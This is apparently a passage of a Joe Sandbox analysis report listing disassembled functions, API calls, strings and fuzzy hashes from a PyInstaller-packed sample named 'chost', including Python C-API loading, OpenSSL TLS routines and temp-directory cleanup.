                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                        • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                        • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                        • Instruction ID: 2f78c17e8f6663816fc82164a7c7165028fca91e9fed9c9ce818c0f85e2fa460
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12D17231A09A8386E7208F36E8952AD7760FF84B58F508279EA5DC7BA9DF3CD145C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378252189.00007FFDEAE41000.00000040.00000001.01000000.00000022.sdmp, Offset: 00007FFDEAE40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378210021.00007FFDEAE40000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEA2000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEEE000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEF2000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEF7000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF54000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF57000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378628612.00007FFDEAF58000.00000080.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378672916.00007FFDEAF59000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdeae40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E141730ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2670129840-0
                                                                                                                                                                                                                                        • Opcode ID: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                        • Instruction ID: a843cef89d87b8f7ad0d2ad00116473117a151218120ec5600c6a7747a3c0388
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10316D76708B838AEB689F60E8603E93768FB84B44F44403ADA8D47B95DF39C548C711
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF69436841B
                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF69436849E
                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684BD
                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684CB
                                                                                                                                                                                                                                        • FindClose.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684DC
                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684E5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                        • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                        • Instruction ID: f54adb1723f03b9f80fca2c002b245018af0083a498a69ff525712df6ff72109
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9341B221A0D94381EA359B36E4C52B97360FB98758F90837AE99DC36D8DF3CD54AC700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                        • Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                                        • Instruction ID: e31b143263c36518f438ea679bbcec1f8fbcd3c7484a44a0262f625091ebbd38
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1310876709B8186EB608F60E860BAD7368FB88744F44403ADA5E47B99DF7CD648C710
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                        • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                        • Instruction ID: d8c6b062e9219d83e5a2ee686fc4abe43069d8fed9d9821c92c2b84464b22ee0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9313272619B8285EB709F61E8807EE7364FB84744F448439DA4E87B99EF7CD548C710
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                        • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                        • Instruction ID: 6dbc73b780dc91aa7294d30e8da47bf6571c999bc8b6125a66cbdcfa3ba5e67d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83317432618B8285D770DF36E8802AE73A4FB88754F544139EA9D87B55DF3CD145CB00
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                                        • API String ID: 0-1194634662
                                                                                                                                                                                                                                        • Opcode ID: dec3abec53ea88dd23b96ea7d6e0bf55a5ec65c0cc74eefb8bf854ade513a757
                                                                                                                                                                                                                                        • Instruction ID: 05e9a52907f3fe2dc226ef67f53f3fa6e228c483ce2d8ba0ebc02072d24abee7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dec3abec53ea88dd23b96ea7d6e0bf55a5ec65c0cc74eefb8bf854ade513a757
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61D16D21B0968281EB509B65D860BB97798FB85B84F484036EE6C4BFEECF7DE541C710
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                        • Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                                        • Instruction ID: 372393b69a4ec3f3c56b15206987a8cba900712ea79a1b66b452bf340369e673
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64B1B722B1C68681EE719B73D4801B9A3A1EB95BE4F449179E99DC7B89EF3CE441C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                                                                        • API String ID: 3568877910-3130753023
                                                                                                                                                                                                                                        • Opcode ID: 5dc7fcbe69d8e434889cc8963c8387381130f446ff2a30149aa795b244e427f1
                                                                                                                                                                                                                                        • Instruction ID: c54e714ab13bc27deea76108db65581f36586b2376d43d7187def7530c942bfc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dc7fcbe69d8e434889cc8963c8387381130f446ff2a30149aa795b244e427f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F12B262B08A8241FB14AB65D461ABDB7A8FB81788F504131DE6E47FDEDF7CE5418700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
                                                                                                                                                                                                                                        • API String ID: 3568877910-446233508
                                                                                                                                                                                                                                        • Opcode ID: fa1fb7101f3f476e7f0c3d6d4dcd00bc7968ab7eed5c18ac657f84400f9b10b7
                                                                                                                                                                                                                                        • Instruction ID: 2d335410330028bfa3052a323e4bc7bc4221b028f4a9b97edaf8afa9b8e02cdb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa1fb7101f3f476e7f0c3d6d4dcd00bc7968ab7eed5c18ac657f84400f9b10b7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17D16061B0CA4281FB54EA229961BBE72ADEF84BC8F640035DD2D47EDEDF2DE5418740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365830
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365842
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365879
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436588B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658A4
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658B6
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658CF
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658E1
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658FD
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436590F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436592B
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436593D
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365959
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436596B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365987
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365999
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943659B5
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943659C7
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                        • API String ID: 199729137-653951865
                                                                                                                                                                                                                                        • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                        • Instruction ID: 3a5623702a2c4a47feeda6c6c4281f3a1de03cf2bc08da220e03fc71c303ca39
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A22B564A49B0781FA39DB77B8E557472A0EF14791F54D4BDD81EC2BA0EF3CA548D200
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
